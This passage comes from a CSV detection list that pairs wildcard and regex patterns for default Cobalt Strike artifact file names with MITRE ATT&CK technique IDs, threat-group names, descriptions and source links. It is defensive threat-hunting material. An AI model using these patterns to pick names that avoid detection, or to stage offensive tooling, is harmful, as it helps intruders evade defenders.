- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.x64.exe*",".{0,1000}artifact\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.x86.dll*",".{0,1000}artifact\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.x86.exe*",".{0,1000}artifact\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact_payload*",".{0,1000}artifact_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*artifact_payload*",".{0,1000}artifact_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact_stageless*",".{0,1000}artifact_stageless.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*artifact_stageless*",".{0,1000}artifact_stageless.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact_stager*",".{0,1000}artifact_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*artifact_stager*",".{0,1000}artifact_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32*.exe*",".{0,1000}artifact32.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32.dll*",".{0,1000}artifact32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32.dll*",".{0,1000}artifact32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32.exe*",".{0,1000}artifact32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32.exe*",".{0,1000}artifact32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact32big.dll*",".{0,1000}artifact32big\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32big.exe*",".{0,1000}artifact32big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32svc.exe*",".{0,1000}artifact32svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact32svcbig.exe*",".{0,1000}artifact32svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64*.exe*",".{0,1000}artifact64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact64.dll*",".{0,1000}artifact64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 